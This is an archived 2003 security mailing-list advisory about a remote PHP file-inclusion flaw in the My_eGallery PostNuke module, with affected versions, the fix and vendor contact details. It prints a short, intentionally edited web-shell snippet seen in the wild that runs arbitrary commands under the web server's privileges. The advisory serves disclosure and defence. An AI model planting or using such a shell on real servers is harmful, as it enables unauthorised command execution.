[UNIX] My_eGallery Code Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 11/27/03

  • Next message: SecuriTeam: "[NEWS] GnuPG's ElGamal Signing Keys Compromised" 
    To: list@securiteam.com
Date: 27 Nov 2003 11:34:33 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      My_eGallery Code Injection
    ------------------------------------------------------------------------

    SUMMARY

     <http://lottasophie.sourceforge.net/index.php> My_eGallery is "a very
    nice PostNuke module, which allows users to create and manipulate their
    own galleries on the web, plus offers various additional features". A
    vulnerability in the product allows remote attackers to inject code and
    cause it to execute under the privilieges My_eGallery runs under.

    DETAILS

    Vulnerable systems:
     * My_eGallery version 3.1.1.f and prior

    Immune systems:
     * My_eGallery version 3.1.1.g

    Certain PHP files have some parameters which are used in include functions
    not filtered. An intruder can craft PHP code on their Web site and supply
    parameter to My_eGallery so it actually includes malicious PHP code.

    The following code was captured as being used in the wild (edited
    intentionally):
    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      print_output();
    ?>

    This allows execution of any command on the server with My_eGallery, under
    the privileges of the Web server (usually apache or httpd).

    Solution:
    Vendor was contacted and promptly replied. Fix is available at the
    vendor's site:
    <http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5> http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

    As this was seen being exploited in the wild, users are urged to upgrade
    to the latest version as soon as possible.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Bojan.Zdrnja@LSS.hr> Bojan
    Zdrnja.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] GnuPG's ElGamal Signing Keys Compromised"

    Relevant Pages